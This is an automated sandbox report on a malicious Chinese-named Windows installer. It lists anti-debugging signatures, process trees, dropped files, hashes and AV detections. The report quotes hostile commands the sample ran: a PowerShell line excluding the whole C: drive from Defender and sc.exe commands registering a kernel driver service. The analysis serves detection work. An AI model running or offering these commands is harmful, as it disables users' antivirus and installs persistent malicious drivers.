Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB5E090 FindFirstFileA,FindClose,FindClose, 6_2_6CB5E090
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 9_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 9_2_00567496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00569C60 GetSystemInfo, 9_2_00569C60
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000002.2136132669.000000000131E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000002.2136132669.000000000131E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6C9E3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C9E3886
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB73871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CB73871
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 9_2_005E57D0
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB7D425 mov eax, dword ptr fs:[00000030h] 6_2_6CB7D425
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB7D456 mov eax, dword ptr fs:[00000030h] 6_2_6CB7D456
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB7286D mov eax, dword ptr fs:[00000030h] 6_2_6CB7286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CB6C3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CB6C3AD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp Code function: 6_2_6CC3A700 cpuid 6_2_6CC3A700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0056AB2A GetSystemTimeAsFileTime,9_2_0056AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00600090 GetVersion,9_2_00600090
MITRE ATT&CK matrix (a number in parentheses is the signature count shown in the report for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | Windows Service (1) | Access Token Manipulation (1) | Masquerading (11) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Windows Service (1) | Disable or Modify Tools (1) | LSASS Memory | Security Software Discovery (431) | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Service Execution (1) | Logon Script (Windows) | Process Injection (111) | Virtualization/Sandbox Evasion (241) | Security Account Manager | Virtualization/Sandbox Evasion (241) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Native API (1) | Login Hook | DLL Side-Loading (1) | Access Token Manipulation (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Process Injection (111) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | File and Directory Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1) | Proc Filesystem | System Information Discovery (45) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1580551; Sample: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe; Start date: 25/12/2024; Architecture: WINDOWS; Score: 92)

Top-level signatures: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; 2 other signatures

Process tree (dropped files in parentheses, signatures in square brackets):
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe started (C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, PE32)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp started (C:\Users\user\AppData\Local\...\update.vbc, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+) [Adds a directory exclusion to Windows Defender]
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe started (C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, PE32)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp started (C:\Users\user\AppData\Local\...\update.vbc, PE32; C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Program Files (x86)\Windows NT\7zr.exe, PE32) [Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger]
          • 7zr.exe started (C:\Program Files (x86)\...\tProtect.dll, PE32+)
            • conhost.exe started
          • 7zr.exe started
            • conhost.exe started
      • powershell.exe started [Loading BitLocker PowerShell Module]
        • conhost.exe started
        • WmiPrvSE.exe started
    • Conhost.exe started
  • cmd.exe started
    • sc.exe started
      • conhost.exe started
  • cmd.exe started
    • sc.exe started
      • conhost.exe started
  • 31 other processes started
    • sc.exe started (3 instances, each followed by a conhost.exe)
    • 27 other processes started
      • conhost.exe started
      • 26 other processes started

Submitted file:
Source | Detection | Scanner
#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | 10% | Virustotal

Dropped files:
Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 26% | ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc | 38% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal
C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbc | 26% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbc | 26% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | false | high
https://www.remobjects.com/ps | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F0FB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000000.2109976636.00000000002F1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000000.2129491702.000000000076D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108115656.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, 00000000.00000003.2108502231.000000007F0FB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000000.2109976636.00000000002F1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000006.00000000.2129491702.000000000076D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp.5.dr | false | high
        No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580551
Start date and time: 2024-12-25 04:30:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe (renamed because the original name is a hash value)
Original Sample Name: _1.1.2.exe
Detection: MAL
Classification: mal92.evad.winEXE@142/31@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 27
• Number of non-executed functions: 116
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 23.64.59.120, 23.64.59.136, 13.85.23.206, 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, dns.msftncsi.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
22:30:57 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp modified
22:30:59 | API Interceptor | 21x Sleep call for process: powershell.exe modified
        No context
        No context
        No context
        No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.7.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.5.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.3.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | malicious | Unknown
Process: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
File Type: data
Category: dropped
Size (bytes): 2816881
Entropy (8bit): 7.999933043989355
Encrypted: true
SSDEEP: 49152:ZBrHFbLMoMCEikwqNJq19boUCFCLzBAZJROkR+8nWn80/E7mWF1U/I9:ZpHF8AEi9UUCOBCROoNn08087momq
MD5: 30DAC62C861E3FE4F2E8AD658111B19D
SHA1: C9146F70AB0EB27E51D3DBDF903CBAAEDF8C98FF
SHA-256: 72F3161CF0EA21DA1C58A372B113F4C1B4685B1707B035FA0BFC46491864942A
SHA-512: 69F680EB3A130DC4C1F377F20A484EFB526DD4A9AAD7FE1CB82AD80AEBB86E2B4F1E8259FF35A3D87C93B504C888F96030853033A88522B497344813CCA7F7C8
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3621376
Entropy (8bit): 7.006090025798393
Encrypted: false
SSDEEP: 98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
MD5: FCADEAE28FCC52FD286350DFEECD82E5
SHA1: 48290AA098DEDE53C457FC774063C3198754A161
SHA-256: 34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
SHA-512: 56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 26%
• Antivirus: Virustotal, Detection: 38%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
File Type: data
Category: dropped
Size (bytes): 2816881
Entropy (8bit): 7.999933043989355
Encrypted: true
SSDEEP: 49152:ZBrHFbLMoMCEikwqNJq19boUCFCLzBAZJROkR+8nWn80/E7mWF1U/I9:ZpHF8AEi9UUCOBCROoNn08087momq
MD5: 30DAC62C861E3FE4F2E8AD658111B19D
SHA1: C9146F70AB0EB27E51D3DBDF903CBAAEDF8C98FF
SHA-256: 72F3161CF0EA21DA1C58A372B113F4C1B4685B1707B035FA0BFC46491864942A
SHA-512: 69F680EB3A130DC4C1F377F20A484EFB526DD4A9AAD7FE1CB82AD80AEBB86E2B4F1E8259FF35A3D87C93B504C888F96030853033A88522B497344813CCA7F7C8
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56514
Entropy (8bit): 7.996192844152609
Encrypted: true
SSDEEP: 1536:Af2p56rS/DpbGo5YM8KCF9wnVHalZQkMiHzN:Af2pD/Dpd5YMWq5aYWHzN
MD5: 76A87B3550627ACE10DF48ECD5537029
SHA1: D34842F146058E6D12FDCB41296819B0A10FB153
SHA-256: 581D714F4E7545712390695EEFFED03F87F765AE4DCA475B0312287309BF649E
SHA-512: D57B6ABA9EB143E079BECED4D4EBD941E3961E1A8279DF17C39CE816242030821F9BAAF0C30988D5C7EEE27ABED4EE588089B65EAA828CCEBAFD5C83F1D992C0
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56514
Entropy (8bit): 7.996192844152606
Encrypted: true
SSDEEP: 768:BRzzwFFBJ/XghYQ6peMARgkAAgne1ttjDz7bfzRTBozKyYP2oBXa6g:BRqaYQyapAA71ttjD7zpJvXi
MD5: F3DAC8AF8FA59C160B8B538FAF3F0A8F
SHA1: D85BC8165C09EB7B64359CB6615D32CBB4F6142A
SHA-256: 591885182DD1E3348C8228BE438AADF9C62611F52AB5E7D267AB556E5533D852
SHA-512: 8FFECB53FF972F1854F62E4CD75E9683BEAE1FF9931E6047DE2A2A25C13CF3D72BF6EA89B21E0C27EBBE3C4AF91A64ACB7D8C33E88398B079A5FF089D092D535
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255975
Encrypted: true
SSDEEP: 1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5: CEA69F993E1CE0FB945A98BF37A66546
SHA1: 7114365265F041DA904574D1F5876544506F89BA
SHA-256: E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512: 4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious: false
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):56546
                                    Entropy (8bit):7.996966859255979
                                    Encrypted:true
                                    SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                    MD5:4CB8B7E557C80FC7B014133AB834A042
                                    SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                    SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                    SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                    Malicious:false
